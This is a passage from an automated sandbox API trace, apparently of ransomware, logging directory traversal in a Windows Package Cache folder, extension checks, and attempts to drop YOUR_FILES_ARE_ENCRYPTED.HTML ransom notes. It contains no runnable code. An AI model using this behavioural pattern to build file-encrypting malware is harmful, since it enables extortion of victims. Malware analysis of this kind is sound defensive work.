lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x17798a50, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0xfc922670, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0170.191] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 92 [0170.191] lstrcmpW (lpString1="vcredist_x86.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.191] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0170.191] lstrlenW (lpString=".exe") returned 4 [0170.192] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0170.192] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc5bb00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccccdf20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.192] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0170.192] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.192] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc5bb00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccccdf20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.192] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.192] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0170.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.192] GetProcessHeap () returned 0x270000 [0170.193] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.193] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 1 [0170.193] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned 86 [0170.193] GetProcessHeap () returned 0x270000 [0170.193] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.193] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0170.193] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*" [0170.193] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.193] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.193] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0170.193] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned 95 [0170.193] GetProcessHeap () returned 0x270000 [0170.193] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.193] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0170.194] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*" [0170.194] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.194] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.194] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccd1a1e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccd1a1e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0170.194] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned 119 [0170.194] GetProcessHeap () returned 0x270000 [0170.194] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.194] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0170.194] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*" [0170.194] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccd1a1e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccd1a1e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.194] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccd1a1e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccd1a1e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.194] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3166700, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc3166700, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x4b4520, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab.AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A", cAlternateFileName="CAB1CA~1.AF8")) returned 1 [0170.194] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A") returned 193 [0170.194] lstrcmpW (lpString1="cab1.cab.AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.194] PathFindExtensionW (pszPath="cab1.cab.AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A") returned=".AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A" [0170.194] lstrlenW (lpString=".AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A") returned 65 [0170.194] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf82e000, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xbf82e000, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xbf82e000, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0170.195] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 148 [0170.195] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.195] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0170.195] lstrlenW (lpString=".msi") returned 4 [0170.195] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0170.195] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcccf4080, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcccf4080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.195] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0170.195] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.195] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcccf4080, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcccf4080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.195] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.195] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0170.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.195] GetProcessHeap () returned 0x270000 [0170.196] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.196] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccfedc00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.196] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.196] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.196] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccfedc00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.196] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.196] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.196] GetProcessHeap () returned 0x270000 [0170.197] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.197] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccfedc00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.197] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.197] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.197] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccfedc00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.197] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.197] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.197] GetProcessHeap () returned 0x270000 [0170.198] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.198] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0 [0170.198] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0170.198] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0170.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.198] GetProcessHeap () returned 0x270000 [0170.199] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) returned 1 [0170.203] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c798490, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd013d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft", cAlternateFileName="REGID1~1.MIC")) returned 1 [0170.203] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft") returned 50 [0170.203] GetProcessHeap () returned 0x270000 [0170.203] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, 